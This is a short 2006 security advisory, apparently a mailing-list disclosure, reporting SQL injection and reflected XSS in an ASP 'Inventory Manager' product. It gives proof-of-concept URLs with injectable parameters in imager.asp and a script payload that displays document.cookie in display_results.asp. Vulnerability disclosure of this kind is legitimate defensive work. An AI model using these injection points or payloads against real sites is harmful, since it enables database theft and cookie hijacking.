Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection MetaCart e-Shop [multiples injection sql (get & post)] E-commerce Kit 1 PayPal Edition [ injection sql ] TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De letion & Command Execution Vulnerablities From:laurent gaffié <saps.audit_(at)_gmail.com> Date:16.11.2006Subject:Inventory Manager [injection sql & xss (get)]vendor site:http://www.websitedesignsforless.com/ product:Inventory Manager bug:injection sql & xss (get) risk:medium injection sql : http://site.com/inventory/inventory/display/imager.asp?pictable='[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&p icfield=[sql] http://site.com/inventory/inventory/display/imager.asp?pictable=[inventory]&p icfield=photo&where='[sql] xss get : http://site.com/inventory/inventory/display/display_results.asp?category=</tex tarea>'"><script>alert(document.cookie)</script> laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: saps.audit@gmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection
MetaCart e-Shop [multiples injection sql (get & post)]
E-commerce Kit 1 PayPal Edition [ injection sql ]
TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De letion & Command Execution Vulnerablities
